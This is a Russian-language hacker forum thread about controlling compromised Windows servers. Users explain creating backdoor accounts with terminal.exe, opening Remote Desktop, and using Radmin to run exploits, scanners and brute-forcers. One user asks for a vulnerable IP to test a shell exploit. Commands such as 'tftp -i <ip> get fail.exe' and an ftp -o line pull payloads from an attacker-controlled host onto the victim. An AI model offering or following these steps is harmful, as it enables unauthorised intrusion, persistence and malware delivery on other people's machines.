а смысл делать учетку если почти на всех компах запрещено подключение к удаленному раб. столу ? вот для етого и нужен радмин для того чтобы он открыл нам порт к конекту через RADMINviever
Мде.... Чтобы открыть порт - качаешь файл terminal.exe и делаешь из дедика - службу сервисов и можешь делать коннект через удаленный рабочий стол , а там делай все что захочешь.
тоесть как я понял можно и без радмина точно также залить terminal , создать учетку и го в удален стол ?
Ты будешь через радмин управлять дедиком? Запускать , компилировать эксплойты допустим , запускать сканеры и бруты?
преимущества то есть , но где взять радмина одним файлом ? через него можно быстро перекинуть файлы , ну а потом уже удаленн стол
SEWERN друг, кинь мне один IP, на который у тебя открывает cmd ? хочу проверить свои настройки.. а то пробовал больше 100 -ничего не получается .. все висит на Triggering the vulnerability...
Так же стандартными программами можно в ХР cmd > shutdown /? - полная справка. -s - вырубить комп -t - время "выруба" -r - перезагрузить Это основные значения
ZyXEL у меня тут небольшой вопросик, а какими командами можно за пустить фтп сервак)?? я щас нахожусь Code: C:\>ftp ftp
Запусти у себя фтп сервер прогой любой. Потом заходишь в смд к дедику и пишешь: C:\> ftp ftp o xxx.xxx.xxx.xxx - ip adress фтп
вопщем, иногда шелл получает, как только нажимаешь интеракт, сразу вырубается и еще по поводу terminal.exe: запускаю его, учетка создается, при заходе авторизацию проходит, выходит Да/Нет, что типа если "Windows/-Windows" (толи юзер такой, толи машина) уже зашел и его выкинет, нажимаю Да, выходит алерт, что невозможно выкинуть и опять Да/Нет тот
я юзаю по этому способу tftp -i tvoi-ip-adress get fail.exe , так проще ftp не просит акк и пасс , _https://forum.antichat.ru/threadnav99665-10-10-%E4%E5%E4%E8%EA.html 96 пост